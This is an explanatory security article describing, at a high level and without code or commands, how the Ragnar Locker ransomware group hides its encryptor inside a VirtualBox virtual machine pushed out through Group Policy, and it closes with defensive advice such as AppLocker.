Virtual machines have long been heralded as a tool for avoiding malware and ransomware infections. Many security-conscious IT pros, for example, do all of their casual Web browsing from within a virtual machine. The idea is that if a malware infection were to occur, then the virtual machine could easily be reset to a pristine state while the parent operating system remained completely isolated from the infection. Recently, however, ransomware authors have begun using virtual machines as an attack mechanism and Windows administration tools as a way to evade detection.
Perhaps the best example of this is an attack conducted by the Ragnar Locker Group, which has been involved in some high-profile extortion schemes in the past. One of the widely publicized examples was when the group attacked Energias de Portugal. In that particular attack, the group claimed to have stolen 10 TB of data and threatened to release the data to the public unless the company paid a ransom of 1,580 bitcoin (which was about 11 million U.S. dollars). More recently, business travel management company CWT Global B.V. paid a ransom demand following a ransomware attack that reportedly involved Ragnar Locker.
The Ragnar Locker Group is now using virtual machines as a tool for helping its ransomware to evade detection. The attack begins by compromising a Windows machine in an effort to gain administrative access. This is commonly done by exploiting an insecure (and externally accessible) RDP connector. Once the group has gained administrative access, the next step in the attack is to modify a Group Policy Object.
Windows administrators commonly use Group Policy settings as a tool for pushing legitimate software applications to network endpoints. If you look at the figure below, for example, you can see that the Group Policy Management Editor provides a Software Installation option beneath the User Configuration \ Policies \ Software Installation node. Ragnar Locker exploits this particular Group Policy setting as a tool for distributing its ransomware. However, this process isn’t quite as simple as merely packaging malware and using Group Policy settings as a distribution tool. If that was all that was required, then the malicious software would almost certainly be detected by antivirus software.
One of the ways Ragnar Locker avoids detection is through the use of native Windows administration tools. Because these tools are a part of the Windows operating system, their use is somewhat unlikely to be immediately determined to be malicious. While victims will no doubt eventually figure out that their networks have been compromised, the use of a native admin tool typically isn’t going to raise an immediate alarm like the detection of malware would.
The Group Policy setting instructs Windows to run Microsoft Installer (MSIExec.exe). It passes parameters to the installer that cause it to silently download a malicious MSI package from the internet. This package includes, among other things, a copy of Oracle’s VirtualBox hypervisor and a lightweight virtual machine image. Some support scripts that are included in the MSI package disable various Windows security features and install VirtualBox along with the malicious virtual machine. They also delete volume shadow copies, thereby preventing the user from restoring previous (unencrypted) versions of the files without the aid of a dedicated backup application.
Once everything is in place, the virtual machine goes to work encrypting everything that it can. It attacks both local storage and network storage. It even goes so far as to terminate any applications that the user is currently working in so that the files become unlocked and can therefore be encrypted.
Because the ransomware is running within a virtual machine, its presence is likely to evade detection. The Windows operating system sees all of the encryption activity as being related to a virtual machine, rather than being able to see the malicious process that is running inside of the virtual machine. Sophos provides a detailed analysis of how the Ragnar Locker exploit works.
The good news is that the Ragnar Locker attacks are highly targeted. You aren’t going to fall victim to this attack by accidentally opening a malicious email attachment. After all, the attack can only succeed if the attacker is able to first establish administrative access to the target system.
Even so, I expect to see copycats perform similar, more random attacks in the future. Since so many people log into their PCs with administrative credentials, there is nothing stopping ransomware from exploiting a user’s existing credentials and performing a similar attack. As such, organizations should consider using AppLocker or a third-party tool to prevent the installation of unauthorized software.